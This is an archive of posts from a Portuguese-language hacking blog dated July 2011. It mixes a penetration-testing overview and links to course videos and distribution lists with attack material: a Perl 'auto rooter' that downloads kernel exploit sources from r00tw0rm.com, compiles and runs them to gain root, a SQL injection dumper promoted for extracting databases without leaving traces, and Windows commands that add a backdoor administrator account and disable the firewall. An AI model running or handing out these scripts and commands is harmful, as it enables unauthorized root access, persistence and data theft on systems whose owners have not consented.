banner468

domingo, 31 de julho de 2011

Papel de parede do Blog

Papel de parede do Blog:


Link: http://www.4shared.com/photo/VQR6pmr5/Remote_Execution_Wallpaper_by_.html

Não foi feito especialmente para o blog, mas achei muito bacana, foi feito pelo Darioxhcx.

sábado, 23 de julho de 2011

Conceito básicos para um teste de penetração


O teste de penetração é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma má configuração do sistema, falhas em hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas contramedidas. Todas as análises submetidas pelos testes escolhidos são apresentadas no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta de resolução ou de uma solução técnica.
Índice

    1 Objetivo
    2 Testes caixa branca vs. caixa preta
    3 Sua aplicação
    4 Ver também
    5 Referências



Objetivo

O objetivo do teste de penetração é determinar a viabilidade de uma ataque e mensurar o seu impacto, caso seja bem sucedido se descoberto. Ele age como um componente na auditoria de segurança.


Testes caixa branca vs. caixa preta

Os testes de penetração podem ser realizados de várias maneiras. A diferença mais comum é a quantidade de detalhes da implementação do sistema a ser testado, que estão disponíveis para os testadores.

O teste da caixa preta assume que não existe qualquer conhecimento prévio da infra-estrutura a ser testada. Sendo que o primeiro teste deve determinar a localização e extensão dos sistemas antes de iniciar a análise.

O teste da caixa branca assume que o testador possui total conhecimento da infra-estrutura a ser testada, incluindo o diagrama da rede, endereçamento IP e qualquer informação complementar.

Teste de caixa preta simulam um ataque de alguém que esteja familiarizado com o sistema, enquanto um teste de caixa branca simula o que pode acontecer durante o expediente de um trabalho ou depois de um "vazamento" de informações, em que o invasor tenha acesso ao código fonte, esquemas de rede e, possivelmente, até mesmo de algumas senhas.


Sua aplicação
Os serviços oferecidos por empresas contratadas para usar o teste de penetração, podem ser uma simples varredura na organização dos endereços IP, abrir/fechar portas ou fazer uma auditoria completa no escopo da rede em busca de vulnerabilidade.

Visão geral

Esse tipo de teste analisa o sistema para qualquer tipo de vulnerabilidade em potencial, explorando vulnerabilidades causados por sistema fracos, mau configurados ou com deficiência operacional. Todos os problema encontrados devem ser reportados ao prestador do serviço.
Para o pessoal que esta ingressando na área, isso artigo e um bom começo, vou agradecer ao pessoal do binushacker.net por informações, mas a frente disponibilizo alguns modelos de relatórios que eu possuo.



Conceitos para os testes:    
 











Etapas Objetivo Técnicas Ferramentas
1 Coletando informações (Footprinting) range de endereços, namespace, informações Sites de busca, whois, DNS zone transferência whois, host, usenet, edgar db, dig, nslookup, samspade, google
2 Impressão digital (Fingerprinting) identificação de serviços, pontos de entrada varredura de ping, TCP/UDP scan, Detecção de OS, netBIOS, SNMP, VPN nmap, unicornscan, paketto, queso, siphon, scanline, cheops-ng, nbtscan, snmpwalk, ike-scan
3 Enumeração identificação de contas de usuário válido, pastas mal protegidas contas da lista de usuários, pastas, banner grabbing dumpsec, sid enum, nat, legion, dcetest, rpcinfo, showmount, netcat, telnet
4 Ganhando acesso Reunidos dados suficientes, tendo acesso ao sistema/rede password eavesdropping, brute force (força bruta) tcpdump, nat, legion, tftp, pwdump, ttdb, bind, IIS .HTR/ISM.DLL, dsniff, ettercap, hydra, brutus-aet2
5 Escalação de privilégios conseguir acesso ao administrador, obter controle completo (root/admin) quebra de senha(password cracking), exploits conhecidos rainbow crack, ophcrack, john the ripper, ophcrack, l0phtcrack, local exploits
6 Furtando dados Consegui acesso ao sistema/rede avaliar confia, procure senhas em texto rhosts, hosts, lsa secrets, user data, config files, registry, scripts, services
7 Cobrindo rastros concluir propriedade de sistema, escondendo intrusão limpando os logs, escondendo ferramentas logcleaner-ng, winzapper, rootkits, file streaming
8 Backdooring configurando backdoors para recuperar o acesso privilegiado criar usuário, lotes de cronograma, infectar arquivos de inicialização, trojanisation, controle remoto cron, at, rc, netcat, keystroke loggers, fpnwclnt.dll, tini, adore, vnc, bo2k
9 Negação de Serviço tornar recursos do sistema indisponível, desative o alvo SYN flood, ICMP techniques, SRC/DST-SYN-requests, OOB, DDoS smurf, bonk, jolt, land, nestea, newtear, syndrop, teardrop, winnuke, trinoo, tfn2k, slowloris, loic


Roteiro de um teste de penetração:



Ref:
http://pt.wikipedia.org/wiki/Teste_de_penetra%C3%A7%C3%A3o
http://remote-execution.blogspot.com/2011/05/metodologias-de-testes-de-penetracao.html

quarta-feira, 20 de julho de 2011

2011 Linux Auto r00t3r Beta version 1.0


Código:

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS           #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 root    => To root            #\n";
print "#    perl $0 del     => Delete Exploit     #\n";
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter =)        #\n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #\n";
print "#                                                          #\n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

                              
if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");
}

Ref: http://www.r00tw0rm.com/forum/showthread.php?75-2011-Linux-Auto-r00t3r-Beta-version-1.0

Por Cross

segunda-feira, 18 de julho de 2011

Canal de IRC - Chat on-line



Para os que preferem clientes.
Server: freenode.net
Sala: request

segunda-feira, 11 de julho de 2011

As principais distribuições Linux brasileiras


1. Big Linux
Página Principal http://www.biglinux.com.br/
Fórums http://www.biglinux.com.br/forum/
Documentação http://www.biglinux.com.br/wiki/
Screenshots http://www.biglinux.com.br/album.html
Espelhos http://www.biglinux.com.br/download.html

2. BRLix
Página Principal http://www.brlix.com/
Fórums http://suporte.brlix.com/
Documentação http://www.brlix.com/ptbr/c23/Instalar-o-brlix
Espelhos http://www.brlix.com/ptbr/c50/Download-do-BRLix
http://saltador.uspnet.usp.br/pub/famelix/

3. Dreamlinux
Página Principal http://www.dreamlinux.net/
Fórums http://dreamlinuxforums.org/
Documentação http://www.dreamlinux.net/documentation.html
http://wiki.dreamlinuxforums.org/
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=dreamlinux
Espelhos http://www.dreamlinux.net/download.html

4. Ekaaty Linux
Página Principal http://www.ekaaty.org/
Screenshots http://www.ekaaty.org/v4/index.php/galeria
Espelhos http://sourceforge.net/project/showfiles.php

5. Epidemic GNU/Linux
Página Principal http://www.epidemiclinux.org/
Fórums http://www.epidemiclinux.org/forum/
http://epidemic.trash80.org/
Documentação http://www.epidemiclinux.org/wiki
Screenshots http://www.epidemiclinux.org/index.php
Espelhos http://www.epidemiclinux.org/index.php

6. Imagineos
Página Principal http://www.imagineos.com.br/
Fórums http://www.imagineos.com.br/forum/
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=imagineos
Espelhos http://www.las.ic.unicamp.br/pub/imagineos/

7. Insigne Linux
Página Principal http://www.insignesoftware.com/
Listas de Discussão http://insignesoftware.com/mailman/listinfo/
Documentação http://wiki.insigne.com/
Screenshots http://www.insignesoftware.com/index.php
Espelhos http://www.insignesoftware.com/index.php

8. JoLinux
Página Principal http://jolinux.cjb.net/
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=jolinux
Espelhos http://users.cjb.net/jolinux/baixar.html

9. Litrix Linux
Página Principal http://www.litrixlinux.org/
Screenshots http://www.litrixlinux.org/site4/screenshots/
Espelhos http://www.litrixlinux.org/site4/download/

10. Poseidon Linux
Página Principal http://poseidon.furg.br/ (Portuguese)
https://sites.google.com/site/poseidonlinux/ (English)
Fórums     http://poseidon.furg.br/index.php
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=poseidon
Espelhos http://poseidon.furg.br/index.php

11. pQui Linux

Página Principal http://site.pquilinux.org/
Fórums http://forum.pquilinux.org/
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=pqui
Espelhos http://site.pquilinux.org/index.php

12. Resulinux
Página Principal http://linuxhard.org/?page_id=3
Fórums http://resulinux.forumdebian.com.br/web/forum
Screenshots http://linuxhard.org/wp/screenshots
Espelhos http://linuxhard.org/wp/download

13. Satux

Página Principal http://www.satux.org.br/
Fórums http://www.satux.org.br/modules.php?name=Forums
Screenshots http://www.thecodingstudio.com/opensource/linux/screenshots/?os=satux
Espelhos http://www.satux.org.br/index.php?option=com_jdownloads&Itemid=5


Mais alguma sugestão?

domingo, 10 de julho de 2011

Verificador Online de Vulnerabilidades WEB


Olá pessoal com muito prazer apresento para vocês essa ferramenta nova que estou desenvolvendo para verificação de vulnerabilidades em aplicações WEB.


Ontem estava conversando com o Souza, e tive essa idéia de desenvolver essa ferramenta, porém preciso da ajuda de vocês para informar falsos positivos para poder aperfeiçoá-la ainda mais.


Preciso que os usuários divulguem a ferramenta para toda a web assim podemos ter uma grande lista de relatórios de falsos positivos.


Link: http://compilandoideias.com.br/verificador/verificador.php
Sobre: http://compilandoideias.com.br/verificador/Como-Utilizar.pdf

Feito pelo amigo Marcelo Moraes do http://www.compilandoideias.com.br/

sexta-feira, 8 de julho de 2011

SQL Injection Online


Hoje em dias usamos muito o Pangolin e o Havij para facilitar um pouco nosso trabalho em extrair dados do banco de dados do site, onde os mesmo podem gerar muitos alertas, então, que tal usar uma ferramenta que usa 1000 linhas de cada vez e recupera 10.000 valores em menos de 2 minutos! Uma grande evolução, ainda mais sem deixar vestigios e sem precisar  ser instalada, útil + simples uso + completa.



Para usar a ferramenta SQL INJECTION Values Parser/Dumper:
http://scan.subhashdasyam.com/dumper.php

segunda-feira, 4 de julho de 2011

Curso de BackTrack 5 em Espanhol



Uma iniciativa da OMHE (Hackers Éticos Mexicano), digirido por Hector Lopez, fez alguns screencast, documentando o uso da distro backTrack 5, cheguei a participar das primeiras screecast, hoje tem o total de 5 aulas.
As aulas são em Espanhol, mostrando o uso básico do sistema.Recomendado para iniciantes que querem aprender a utilizar essa excelente distribuição.

Foi primeiramente divulgado entre os membros do Brasil-Underground.

Primeira Classe:
http://player.vimeo.com/video/24798862

Segunda Classe:
http://player.vimeo.com/video/24798945

Terceira Classe:
http://player.vimeo.com/video/24798976

Quarta Classe:
http://player.vimeo.com/video/25641642

Quinta Classe:
http://player.vimeo.com/video/25641613

Sexta Classe:
http://player.vimeo.com/video/27265723

Sétima Classe:
http://player.vimeo.com/video/27502676

Oitava Classe:
http://player.vimeo.com/video/30102263

Baixar:
http://www.backtrack5.omhe.org/

Meus mirror:
Classe 01 http://www.4shared.com/file/G3JitJOR/Backtrack5-Online-Classe01.html
Classe 02 http://www.megaupload.com/?d=YK9XYBR4 ou http://www.4shared.com/file/e583VUhD/Backtrack5-Online-Classe02.html
Classe 03 http://www.4shared.com/file/A6U7t5Jl/Backtrack5-Online-Classe03.html
Classe 04 http://www.4shared.com/file/6nrYJ2vB/Backtrack5-Online-Classe04.html
Classe 05 http://www.4shared.com/file/IF5f1F6V/Backtrack5-Online-Classe05.html
Classe 06 http://www.4shared.com/file/3XhNKOI7/Backtrack5-Online-Classe06.html
Classe 07 http://www.4shared.com/file/-1bHOfHm/Backtrack5-Online-Classe07.html
Classe 08 http://www.4shared.com/file/ahkHR2qD/Backtrack5-Online-Classe08.html


Senha: bhioreuteamo

sábado, 2 de julho de 2011

Vídeos de Rooted CON 2011



Congresso que visa promover o conhecimento: na edição de 2010 foram lançados vários "0 dias", apresentou os primeiros frutos de ferramentas como o FOCA, EMET, Radare2 ... e contou com figuras históricas, como cena de hacking da rampa e | selvagem | Apostols de, e muitas outras figuras que não foram levantadas na rodada, mas eles estavam.

De acordo com o princípio da neutralidade que rege o Congresso, apresentou um painel já vi na Espanha, com figuras proeminentes, tais como a advocacia Carlos Sánchez Almeida, Marco Francisco Ribas e Xavier, em busca de detalhes do Código Penal ea incorporação de crimes de hackers.

Ele forneceu um ponto de vista empresarial, de modo que aqueles que estão e estarão no mercado de trabalho conhecer a realidade das empresas de segurança, participando estrategistas de grandes empresas, agentes de segurança de grandes corporações e especialistas do governo e da lei Estado.

Além disso, tivemos uma mudança de registo com um olhar cômico para o mundo e a figura do hacker nesta linguagem muito visual.

Tópicos: Engenharia Reversa em Windows e Android, iPhone botnets orientado, banker Trojans e análise forense, princípios de economia aplicada à pirataria, a Teoria das Restrições Goldratt, como se preparar para entrar no mercado de trabalho em segurança, explorar com Oracle Financials "0 dias" incluído como lidar com um sistema global de suporte ao usuário, enganchando em diferentes plataformas, como para fugir de antivírus e firewall pessoal com uma técnica particularmente simples, organização interna das escolas para responder a incidentes no estado, a relação entre crimes de hackers e vários grupos criminosos, ...

No ano passado, nós gastamos muito tempo e esforço: era rígido para iniciar um projeto como esse a partir do zero. Mas graças a você e sua confiança na próxima edição irá aumentar a capacidade da conferência (para você não, ou quase ninguém está impossibilitado de comparecer à esquerda).

Todas essas iniciativas de melhoria são possíveis graças que recebemos de você como participantes de nossos parceiros e patrocinadores. Não nos esqueçamos nem todos os voluntários e outras pessoas que abnegadamente deram-nos boas idéias e esforço e vontade.

Acesso as palestras:
http://vimeo.com/album/1587508/

Ref: http://www.rootedcon.es

sexta-feira, 1 de julho de 2011

Sem privilegio no Windows? o que fazer?



Em algumas fases de pentest ou no seu cotidiano, você vai deparar com um Windows e suas inúmeras vulnerabilidades... caso esteja usando o grande metasploit, você ainda encontra alguns scripts meterpreter que ja quebram o galho, mas não em todas as vezes... e no caso que você esteja usando um exploit monolítico? você digita "whoami" e ver que não tem acesso "root/administrador" do sistema... ta com o cmd.exe na tela e de braços cruzado!!! não entre em desespero... vou mostrar a solução.

Usando alguns comando nativos do Windows, pode reverter esse caso fácil.

Adicionando um usuário no sistema:

net user bhior fabiano1337 /add

Criar grupos e/ou atribuir/remover usuários de grupos específicos:

net localgroup

Adicionado um usuário como administrador ou qualquer outro grupo descrito com o comando acima.

net localgroup Administrador bhior /add

Modifica a requisitos de senha e logon para todas contas:

net accounts

Exibindo informações de configuração do serviço Estação de Trabalho ou Servidor:

net config [server | workstation]

Visualizando computadores on line na rede com compartilhamento:


net view

Visualizando os diretórios compartilhados no seu micro:

net share

Visualizando as maquinas que estão acessando os diretórios compartilhados:

net use

Exibindo os logs das estação de trabalho ou servidor:

net statistics [server | workstation]

Ajuda com o comando?

net help

Caso o firewall esteja impedindo algum outro processo que você esteja querendo fazer:

netsh firewall set opmode disable

Xeque mate!!!

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers